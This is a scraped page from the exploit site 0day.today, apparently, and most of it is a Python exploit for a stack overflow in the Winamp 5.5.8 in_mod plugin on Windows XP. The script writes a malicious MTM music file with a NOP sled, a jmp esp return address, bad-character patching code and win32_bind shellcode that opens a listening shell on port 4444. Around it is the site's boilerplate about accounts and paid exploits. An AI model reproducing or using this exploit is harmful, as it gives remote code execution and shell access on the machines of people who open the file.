0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit
=================================================== Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit =================================================== #!/usr/bin/python # Pwn And Beans by Mighty-D presents: # Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow # WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet # Bug found by http://www.exploit-db.com/exploits/15248/ # POC by fdisk # Exploit by Mighty-D # Special thanks to: # fdisk: Who wrote the skeleton of what you are looking at # Ryujin: For pointing the bug # Muts: For bringing the pain and the omelet ideas that weren't used # dijital1 and All the EDB-Team # The guys from UdeA, Ryepes, HerreraDavid, GomezRam7 # Just one comment: Stupid badchars!!!!!!! header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E" header += "\x04\x0C" * 16 nopsled = "\x90" * 58207 eip = "\xED\x1E\x95\x7C" # jmp esp WIN XP SPANISH change at will patch_shellcode = "\x90" * 16 patch_shellcode += "\x90\x33\xDB" # Set EBX to zero patch_shellcode += "\x54\x5B" # PUSH ESP ; POP EBX GET THE RELATIVE POSITION patch_shellcode += "\x81\xEB\x95\xFC\xFF\xFF" # make EBX point to our shell patch_shellcode += "\x43"*13 # Move EBX as close as we can to the first badchar patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*1 # Move EBX to the first badchar patch_shellcode += "\x80\x2B\x20" # Set it to 13 - verified patch_shellcode += "\x43"*3 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 05 - verified patch_shellcode += "\x43"*16 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\xEC" # Set it to 21 - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x7C" # Set it to 8e - verified patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*30 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 05 - verified patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*11 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x42" # Set it to CB - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x78" # Set it to 92 - verified patch_shellcode += "\x90"*26 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*18 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 04 - verified patch_shellcode += "\x90"*16 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*15 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 02 - verified patch_shellcode += "\x43"*8 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x21" # Set it to EC - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x7C" # Set it to 8e - verified patch_shellcode += "\x90"*14 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*18 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x49" # Set it to c1 - verified patch_shellcode += "\x90"*13 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*4 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to EA, but we need F6 patch_shellcode += "\x80\x2B\xF4" # Set it to F6 - verified patch_shellcode += "\x43"*9 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 11 - verified patch_shellcode += "\x43"*10 # Move EBX to the next badchar patch_shellcode += "\x90"*3 # Nop sled to avoid damage from CrLf patch_shellcode += "\x80\x2B\xCD" # Set it to 3D - verified patch_shellcode += "\x43"*3 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 07 - verified patch_shellcode += "\x43"*11 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified patch_shellcode += "\x43"*4 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified patch_shellcode += "\x90"*13 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*4 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified patch_shellcode += "\x43"*8 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified patch_shellcode += "\x90"*19 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*11 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x8E" # Set it to 7F - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\xDF" # Set it to 2B - verified patch_shellcode += "\x43"*8 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x1E" # Set it to EC - verified patch_shellcode += "\x90"*11 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*12 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 8 - verified patch_shellcode += "\x90"*28 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*29 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\xa7" # Set it to 66 - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf patch_shellcode += "\x80\x2B\xb8" # Set it to 52 - verified patch_shellcode += "\x90"*9 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*17 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 3 - verified patch_shellcode += "\x90"*9 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*3 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified patch_shellcode += "\x90"*12 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*2 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 3 - verified patch_shellcode += "\x43"*7 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 2 - verified patch_shellcode += "\x90"*10 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*6 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 13 - verified patch_shellcode += "\x43"*3 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 5 - verified patch_shellcode += "\x43"*3 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x1B" # Set it to F2 - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\xF4" # Set it to 16 - verified patch_shellcode += "\x90"*19 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*4 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 10 - verified patch_shellcode += "\x43"*4 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 10 - verified patch_shellcode += "\x90"*20 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*17 # Move EBX to the next badchar patch_shellcode += "\x90"*28 # Lazy nopsled patch_shellcode += "\x43"*16 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x26" # Set it to E7 - verified patch_shellcode += "\x90"*18 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\xBE" # Set it to 4C - verified patch_shellcode += "\x43"*7 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 5 - verified patch_shellcode += "\x90"*(66) # win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub shellcode = "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" shellcode += "\x33" # Should be 13 shellcode += "\xa9\x41" shellcode += "\x25" # should be 05 shellcode += "\x3f\x83\xeb\xfc\xe2\xf4\x55\x2b\xee\x72\x41\xb8\xfa\xc0" shellcode += "\x56" # \x21\x8e Ripped shellcode += "\x53\x8d\x65\x8e\x7a\x95\xca\x79\x3a\xd1\x40\xea\xb4" shellcode += "\xe6\x59\x8e\x60\x89\x40\xee\x76\x22\x75\x8e\x3e\x47\x70\xc5\xa6" shellcode += "\x25" # should be 05 shellcode += "\xc5\xc5\x4b\xae\x80\xcf\x32\xa8\x83\xee" # \xcb\x92 shellcode += "\x15\x21\x17" shellcode += "\xdc\xa4\x8e\x60\x8d\x40\xee\x59\x22\x4d\x4e\xb4\xf6\x5d" shellcode += "\x24" #Should be 04 shellcode += "\xd4\xaa\x6d\x8e\xb6\xc5\x65\x19\x5e\x6a\x70\xde\x5b\x22" shellcode += "\x22" # Should be 02 shellcode += "\x35\xb4\xe9\x4d\x8e\x4f\xb5" # \xec\8e Ripped shellcode += "\x7f\xa1\x1f\x6d\xb1\xe7\x4f\xe9\x6f" shellcode += "\x56\x97\x63\x6c\xcf\x29\x36\x0d" # \xc1 Ripped shellcode += "\x36\x76\x0d" # \xf6 ripped shellcode += "\x15\xfa\xef" shellcode += "\xc1\x8a\xe8\xc3\x92" shellcode += "\x31" # Should be 11 shellcode += "\xfa\xe9\xf6\xc8\xe0\x59\x28\xac\x0d" # \x3d ripped shellcode += "\xfc\x2b" shellcode += "\x27" # should be 07 shellcode += "\xc0\x79\x29\xdc\x36\x5c\xec\x52\xc0\x7f" shellcode += "\x32" # should be 12 shellcode += "\x56\x6c\xfa" shellcode += "\x32" # should be 12 shellcode += "\x46\x6c\xea" shellcode += "\x32" # should be 12 shellcode += "\xfa\xef\xcf\x29\x14\x63\xcf" shellcode += "\x32" #should be 12 shellcode += "\x8c\xde" shellcode += "\x3c\x29\xa1\x25\xd9\x86\x52\xC0" # \x7f\x2b Ripped shellcode += "\x15\x6e\xfc\xbe\xd5\x57" shellcode += "\x0d" # \xec Ripped shellcode += "\x2b\xd6\xfe\xbe\xd3\x6c\xfc\xbe\xd5\x57\x4c" shellcode += "\x28" # should be 08 shellcode += "\x83\x76" shellcode += "\xfe\xbe\xd3\x6f\xfd\x15\x50\xc0\x79\xd2\x6d\xd8\xd0\x87\x7c\x68" shellcode += "\x56\x97\x50\xc0\x79\x27\x6f\x5b\xcf\x29" # \x66\x52 Ripped shellcode += "\x20\xa4\x6f\x6f" shellcode += "\xf0\x68\xc9\xb6\x4e\x2b\x41\xb6\x4b\x70\xc5\xcc" shellcode += "\x23" # shoudl be 03 shellcode += "\xbf\x47" shellcode += "\x32" #Should be 12 shellcode += "\x57" shellcode += "\x23" # Should be 03 shellcode += "\x29\xac\x24\x3b\x3d\x94" shellcode += "\x22" # should be 02 shellcode += "\xea\x6d\x4d\x57\xf2" shellcode += "\x33" # should be 13 shellcode += "\xc0\xdc" shellcode += "\x25" # should be 5 shellcode += "\xfa\xe9" # \xf2\x16 Ripped shellcode += "\x57\x6e\xf8" shellcode += "\x30" #should be 10 shellcode += "\x6f\x3e\xf8" shellcode += "\x30" # Should be 10 shellcode += "\x50\x6e" shellcode += "\x56\x91\x6d\x92\x70\x44\xcb\x6c\x56\x97\x6f\xc0\x56\x76\xfa\xef" shellcode += "\x22\x16\xf9\xbc\x6d\x25\xfa\xe9\xfb\xbe\xd5" shellcode += "\x57\xd7\x99" #\xe7\x4c Ripped shellcode += "\xfa\xbe\xd3\xc0\x79\x41" shellcode += "\x25" # should be 05 shellcode += "\x3f" payload = header + nopsled + eip + patch_shellcode + shellcode try: file = open("crash.mtm", "w") file.write(payload) file.close() print "MTM file generated successfuly" except: print "Cannot create file" # 0day.today [2024-12-24] #